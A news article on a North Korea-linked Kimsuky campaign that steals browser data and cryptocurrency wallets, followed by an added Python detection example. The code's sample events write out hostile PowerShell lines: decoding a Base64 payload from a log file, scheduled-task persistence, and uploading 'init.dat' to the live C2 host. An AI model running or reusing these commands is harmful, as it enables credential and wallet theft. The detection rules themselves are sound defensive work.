A cyber-espionage group linked to North Korea, known as Kimsuky, has launched a new wave of phishing attacks combined with sophisticated malware infections, according to cybersecurity researchers. The group’s latest campaign was observed in March 2025 and targets government agencies, think tanks, and individuals involved in foreign policy and national security.
Kimsuky, an advanced persistent threat (APT) group, is known for its data-stealing operations. This time, it has upgraded its methods, using multi-stage attack chains designed to avoid detection while stealing sensitive information.
How the Attack Works
The attack starts when a victim receives a ZIP file containing a malicious script. Once the script is run, it begins a multi-stage infection process.
The malware installs several hidden components that work together to:
- Keep the malware active on the system,
- Collect system details,
- Steal sensitive data and send it to servers controlled by the attackers.
Researchers from K7 Security Labs discovered the attack through indicators of compromise shared within cybersecurity communities. Their analysis revealed that Kimsuky has improved its methods to better avoid detection, extract data more efficiently, and specifically target cryptocurrency assets.
Technical Details of the Malware
The infection starts with a VBScript file that is obfuscated to hide its real purpose. Functions such as chr() and CLng() assemble the malicious PowerShell command at runtime, so the command never appears as plain text in the file and is harder for static scanning to detect.
Once executed, the VBScript runs a PowerShell script that decodes and launches Base64-encoded malware hidden in log files. The PowerShell script collects the system’s BIOS serial number to create a unique ID for the infected machine. It also checks if the system is running in a virtual machine, a common environment used by security analysts, and stops execution if detected.
The decoded PowerShell script contains eleven specialized functions that:
- Steal browser data (logins, cookies, history),
- Target cryptocurrency wallets,
- Upload stolen data,
- Ensure the malware remains active through scheduled tasks.
Focus on Cryptocurrency Theft
The malware targets popular browsers like Edge, Chrome, Firefox, and Naver Whale. It extracts saved credentials, cookies, and browsing history. Additionally, it focuses on over 30 cryptocurrency wallet extensions, including MetaMask, Trust Wallet, and Tron.
For each wallet found, the malware tries to steal database files that may contain access keys and transaction records.
Data Exfiltration and Remote Access
After collecting the stolen data, the malware compresses everything into a ZIP file, renames it as “init.dat” to avoid suspicion, and uploads it to a command-and-control server at:
- http://srvdown[.]ddns[.]net/service3/
This server can also send further commands to the infected systems, giving attackers ongoing remote access.
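As an added defender-side example (not code from the article or from K7 Security Labs), the following Python maps the behaviours described in the technical-details section and the exfiltration section above onto simple process-creation detection rules and runs them over constructed sample events. The event format, file paths and task name are assumptions; only the C2 host and the "init.dat" file name come from the page.

```python
import re

# Constructed sample process-creation events (assumed format: "parent|image|command line").
# Only the C2 host and the "init.dat" name come from the reported campaign; paths and names are made up.
SAMPLE_EVENTS = [
    "explorer.exe|wscript.exe|wscript.exe C:\\Users\\u\\Downloads\\invite.vbs",
    "wscript.exe|powershell.exe|powershell -w hidden -c \"[Convert]::FromBase64String((Get-Content C:\\ProgramData\\svc.log))\"",
    "powershell.exe|powershell.exe|powershell -c \"(Get-WmiObject Win32_BIOS).SerialNumber\"",
    "powershell.exe|schtasks.exe|schtasks /create /sc minute /mo 30 /tn Updater /tr powershell.exe",
    "powershell.exe|powershell.exe|powershell -c \"Invoke-WebRequest -Uri http://srvdown.ddns.net/service3/ -Method Post -InFile init.dat\"",
    "explorer.exe|powershell.exe|powershell -c Get-ChildItem C:\\Users",  # benign admin activity
]

# Each rule: (name, predicate over lower-cased parent, lower-cased image, raw command line).
RULES = [
    # VBScript dropper handing off to PowerShell (stage 1 -> stage 2)
    ("vbscript_spawns_powershell",
     lambda p, i, c: p in ("wscript.exe", "cscript.exe") and i == "powershell.exe"),
    # Base64 payload read out of a .log file
    ("base64_payload_from_log_file",
     lambda p, i, c: "frombase64string" in c.lower() and re.search(r"\.log\b", c, re.I) is not None),
    # BIOS serial number used as a per-victim identifier
    ("bios_serial_fingerprint",
     lambda p, i, c: "win32_bios" in c.lower() and "serialnumber" in c.lower()),
    # Scheduled-task persistence
    ("scheduled_task_persistence",
     lambda p, i, c: (i == "schtasks.exe" and "/create" in c.lower()) or "register-scheduledtask" in c.lower()),
    # Upload of the renamed archive to the reported C2 host
    ("exfil_to_known_c2",
     lambda p, i, c: "srvdown.ddns.net" in c.lower() or "init.dat" in c.lower()),
]

def scan_events(events):
    """Return {rule_name: [matching event lines]} over the given events."""
    hits = {}
    for line in events:
        parent, image, cmdline = (part.strip() for part in line.split("|", 2))
        for name, check in RULES:
            if check(parent.lower(), image.lower(), cmdline):
                hits.setdefault(name, []).append(line)
    return hits

def triage(events, min_rules=2):
    """Flag a host when at least min_rules distinct stages of the chain are observed."""
    hits = scan_events(events)
    return sorted(hits), len(hits) >= min_rules

if __name__ == "__main__":
    for rule, lines in scan_events(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(lines)} event(s)")
    print("flagged:", triage(SAMPLE_EVENTS)[1])
```

Requiring several distinct stages before flagging keeps a lone benign PowerShell or schtasks invocation from raising an alert on its own.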
Growing Cybersecurity Threat
Experts warn that this attack shows Kimsuky’s continued efforts to develop highly advanced malware. It poses serious risks to organizations and individuals holding cryptocurrency or sensitive information.
Security professionals are urged to:
- Use advanced threat detection systems,
- Train employees to recognize phishing emails, which are the main entry point for these attacks.